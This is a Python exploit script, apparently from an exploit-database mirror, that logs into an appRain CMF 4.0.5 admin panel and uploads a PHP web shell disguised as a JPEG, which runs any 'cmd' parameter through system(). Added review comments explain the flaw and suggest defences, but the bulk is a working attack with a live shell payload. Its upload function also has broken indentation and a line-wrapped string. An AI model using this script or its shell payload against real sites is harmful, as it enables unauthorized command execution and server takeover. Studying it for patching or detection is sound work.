## https://sploitus.com/exploit?id=PACKETSTORM:178895
# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)  
# Date: 04/28/2024  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.apprain.org  
# Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip  
# Version: latest  
# Tested on: MacOS  
  
import requests  
import sys  
import time  
import random  
import string  
  
def generate_filename():
    """Return a random file name: five lowercase ASCII letters plus ``.inc``.

    The name is drawn with the non-cryptographic ``random`` module, so it is
    only meant to avoid collisions between runs, not to be unguessable.

    NOTE(review): the ``.inc`` suffix is presumably chosen because the
    upload handler does not reject it; whether a server treats such a file
    as PHP depends on its handler mapping. An extension allow-list on the
    upload endpoint (rather than a deny-list) would cover names like this.
    """
    letters = random.choices(string.ascii_lowercase, k=5)
    stem = "".join(letters)
    return f"{stem}.inc"
  
def login(site, username, password):
    """Authenticate to the appRain admin panel and return the live session.

    Posts the supplied administrator credentials as a URL-encoded form to
    ``https://<site>/admin/system`` and treats the word "Logout" in the
    response body as the sign of a successful login. Every later step of
    this script depends on that session, i.e. the issue demonstrated here
    is only reachable by an already-authenticated admin user.

    Args:
        site: Host name of the target installation (no scheme).
        username: Admin account identifier.
        password: Admin account password.

    Returns:
        The ``requests.Session`` used for the login request, which keeps
        any cookies set by the server for subsequent requests.

    Exits the process via ``sys.exit()`` when the login is not confirmed.
    """
    print("Logging in...")
    time.sleep(2)

    http = requests.Session()
    credentials = {
        'data[Admin][admin_id]': username,
        'data[Admin][admin_password]': password
    }
    form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    reply = http.post(
        f"https://{site}/admin/system",
        data=credentials,
        headers=form_headers,
    )

    # Guard clause: anything without the "Logout" marker counts as a failure.
    if "Logout" not in reply.text:
        print("Login Failed!")
        sys.exit()

    print("Login Successful!")
    return http
  
def upload_shell(session, site):  
"""Upload a PHP-bearing file through the admin file manager and print its URL.

Sends a multipart POST to ``/admin/filemanager/upload`` on the already
authenticated ``session``. The uploaded part has a ``.inc`` name from
``generate_filename()``, a body made of an HTML form plus PHP, and a
declared content type of ``image/jpeg``. The upload counts as successful
only on HTTP 200 with "uploaded successfully" in the response body;
otherwise the process exits via ``sys.exit()``.

Returns nothing; the resulting location is only printed.
"""
print("Shell preparing...")  
time.sleep(2)  
filename = generate_filename()  
upload_url = f"https://{site}/admin/filemanager/upload"  
# The tuple below is (file name, file body, content type). The content type
# is chosen by the client, so the 'image/jpeg' label does not describe the
# body: the body is an HTML form whose PHP block passes the `cmd` query
# parameter to system().
# NOTE(review): for this upload to be accepted, the server presumably
# validates neither the extension nor the actual file content - confirm
# against the appRain upload handler. Server-side checks would be an
# extension allow-list plus content inspection, not the declared MIME type.
# NOTE(review): the string literal is wrapped across several lines on this
# page; as printed it is not a valid single-line Python string.
files = {  
'data[filemanager][image]': (filename, "<html><body><form method='GET'  
name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'  
name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'  
value='Execute'></form><pre><?php if(isset($_GET['cmd'])){  
system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')  
}  
data = {  
'submit': 'Upload'  
}  
response = session.post(upload_url, files=files, data=data)  
# Success is inferred from the status code and a marker string in the body.
# The printed URL shows the script expects uploads to be directly reachable
# under /uploads/filemanager/.
# NOTE(review): that makes two things worth monitoring - non-image files
# appearing in that directory, and GET requests to it carrying a `cmd`
# parameter. Serving the upload directory with script execution disabled,
# or storing uploads outside the web root, would presumably stop the file
# from being interpreted - confirm for the deployment in question.
if response.status_code == 200 and "uploaded successfully" in response.text:  
print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")  
else:  
print("Exploit Failed!")  
sys.exit()  
  
if __name__ == "__main__":
    # Command-line entry point: expects exactly three arguments (host name,
    # admin user, admin password), logs in, then runs the upload step.
    print("Exploiting...")
    time.sleep(2)

    cli_args = sys.argv[1:]
    if len(cli_args) != 3:
        print("Usage: python exploit.py sitename.com username password")
        sys.exit()

    # NOTE: the admin password is taken from argv, so it is visible in the
    # process list and shell history of the machine running the script.
    site, username, password = cli_args
    session = login(site, username, password)
    upload_shell(session, site)